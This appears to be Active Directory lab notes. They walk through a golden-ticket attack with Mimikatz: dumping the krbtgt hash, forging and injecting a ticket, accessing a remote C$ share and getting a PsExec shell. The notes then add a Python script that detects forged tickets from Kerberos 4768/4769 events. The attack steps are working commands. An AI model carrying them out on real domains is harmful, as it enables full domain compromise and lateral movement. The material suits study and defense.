Enable the debug privilege:
privilege::debug
lsadump::lsa /inject /name:krbtgt
What to look for in the output:
Domain : MARVEL / S-1-5-21-1124166008-2273616456-3122094236
RID : 000001f6 (502)
User : krbtgt
* Primary
NTLM : 4b1f4e81d83be29c8ae6be57a820bec8
The domain SID is highlighted in green.
The krbtgt NTLM hash is highlighted in blue.
Generate golden ticket and pass it:
kerberos::golden /User:Administrator /domain:marvel.local /sid:S-1-5-21-1124166008-2273616456-3122094236 /krbtgt:4b1f4e81d83be29c8ae6be57a820bec8 /id:500 /ptt
/id:500 is the built-in Administrator RID. Earlier output listed Administrator:500; that is the value used here.
Open a cmd window that inherits the injected ticket:
misc::cmd
Can we see other PCs' files?
dir \\THEPUNISHER\c$
Yes!
We can take this further: download PsExec.exe and use it to get a shell on the remote machine.
psexec.exe \\THEPUNISHER cmd.exe
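On the detection side, a forged TGT is injected straight into the client's ticket cache, so no DC ever logs a 4768 (TGT issued) for it; the first trace is a 4769 (service ticket requested) presenting a TGT the KDC never issued. The script below, added here and not part of the original notes, flags 4769 events whose account has no 4768 from the same client within a lookback window; the event tuples are constructed samples, and the 10-hour window assumes the default maximum TGT lifetime.

```python
"""
Heuristic golden-ticket detection over Kerberos audit events (4768/4769).

Assumption: events from ALL domain controllers have been merged into one
list, since the DC that issued a legitimate TGT may not be the one that
later logs the service-ticket request. Sample events are constructed.
"""
from datetime import datetime, timedelta

LOOKBACK = timedelta(hours=10)  # assumed default max TGT lifetime

# Constructed sample: (timestamp, event_id, account, client_ip)
SAMPLE_EVENTS = [
    ("2024-01-10 08:00:00", 4768, "fcastle@MARVEL.LOCAL", "10.0.0.25"),
    ("2024-01-10 08:00:05", 4769, "fcastle@MARVEL.LOCAL", "10.0.0.25"),
    # Administrator requests service tickets with no TGT issuance on record
    ("2024-01-10 09:15:00", 4769, "Administrator@MARVEL.LOCAL", "10.0.0.31"),
    ("2024-01-10 09:16:00", 4769, "Administrator@MARVEL.LOCAL", "10.0.0.31"),
]


def parse(events):
    """Normalise raw tuples: parse timestamps, lower-case account names."""
    return [(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), eid, acct.lower(), ip)
            for ts, eid, acct, ip in events]


def find_tgs_without_tgt(events, lookback=LOOKBACK):
    """Return (timestamp, account, ip) for every 4769 whose account/client
    pair has no 4768 within `lookback` before the request."""
    last_tgt = {}      # (account, ip) -> time of most recent 4768
    suspicious = []
    for ts, eid, acct, ip in sorted(parse(events)):
        key = (acct, ip)
        if eid == 4768:
            last_tgt[key] = ts
        elif eid == 4769:
            issued = last_tgt.get(key)
            if issued is None or ts - issued > lookback:
                suspicious.append((ts.isoformat(sep=" "), acct, ip))
    return suspicious


if __name__ == "__main__":
    for hit in find_tgs_without_tgt(SAMPLE_EVENTS):
        print("4769 with no preceding 4768:", hit)
```

Legitimate renewals and long-lived cached TGTs can also trip this check, so treat a hit as a lead to correlate with logon and ticket-lifetime data rather than a verdict.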